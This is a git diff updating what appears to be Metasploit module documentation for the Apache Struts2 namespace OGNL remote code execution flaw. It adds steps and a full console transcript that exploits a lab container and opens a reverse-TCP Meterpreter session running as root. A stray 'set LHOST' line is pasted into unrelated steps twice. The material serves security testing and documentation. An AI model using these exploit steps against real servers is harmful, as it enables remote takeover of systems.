Documentation update
parent
8fe8bf62e3
commit
da7a29f715
|
@ -50,6 +50,7 @@ The vulnerability was reported to Apache by [Man Yue Mo] from Semmle in April 20
|
|||
```
|
||||
|
||||
8. Upon completion, the container will shutdown and you'll return to the host environment. Restart the container, now with a vulnerable endpoint:
|
||||
msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
|
||||
```
|
||||
sudo docker start $CONTAINER_ID
|
||||
```
|
||||
|
@ -83,7 +84,10 @@ The vulnerability was reported to Apache by [Man Yue Mo] from Semmle in April 20
|
|||
- [ ] You will not be given a shell (yet).
|
||||
|
||||
Confirm that payload upload and execution works:
|
||||
- [ ] It doesn't (yet).
|
||||
- [ ] Set a payload, e.g.: ```set PAYLOAD linux/x64/meterpreter/reverse_tcp```
|
||||
- [ ] Configure `LHOST` and `RHOST` as necessary.
|
||||
- [ ] Run the exploit: ```run```
|
||||
msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
|
||||
## Options
|
||||
|
||||
**TARGETURI**
|
||||
|
@ -98,7 +102,7 @@ The vulnerability was reported to Apache by [Man Yue Mo] from Semmle in April 20
|
|||
|
||||
### Version of software and OS as applicable
|
||||
|
||||
Checking a vulnerable endpoint, as installed in the above steps.
|
||||
Checking a vulnerable endpoint, as installed in the above steps:
|
||||
|
||||
```
|
||||
msf > use exploit/multi/http/struts_namespace_rce
|
||||
|
@ -127,3 +131,25 @@ b3d9b350d9b6
|
|||
[*] Exploit completed, but no session was created.
|
||||
msf5 exploit(multi/http/struts_namespace_rce) >
|
||||
```
|
||||
|
||||
Getting a Meterpreter session on the above-described environment:
|
||||
|
||||
```
|
||||
|
||||
msf5 > use exploit/multi/http/struts2_namespace_ognl
|
||||
msf5 exploit(multi/http/struts2_namespace_ognl) > set ACTION help.action
|
||||
msf5 exploit(multi/http/struts2_namespace_ognl) > set RHOSTS 192.168.199.135
|
||||
msf5 exploit(multi/http/struts2_namespace_ognl) > set RPORT 32771
|
||||
msf5 exploit(multi/http/struts2_namespace_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
|
||||
msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
|
||||
msf5 exploit(multi/http/struts2_namespace_ognl) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.199.134:4444
|
||||
[+] Target profiled successfully: Linux 4.4.0-112-generic amd64, running as root
|
||||
[+] Payload successfully dropped and executed.
|
||||
[*] Sending stage (816260 bytes) to 192.168.199.135
|
||||
[*] Meterpreter session 1 opened (192.168.199.134:4444 -> 192.168.199.135:47482) at 2018-08-31 13:15:22 -0500
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
|
Loading…
Reference in New Issue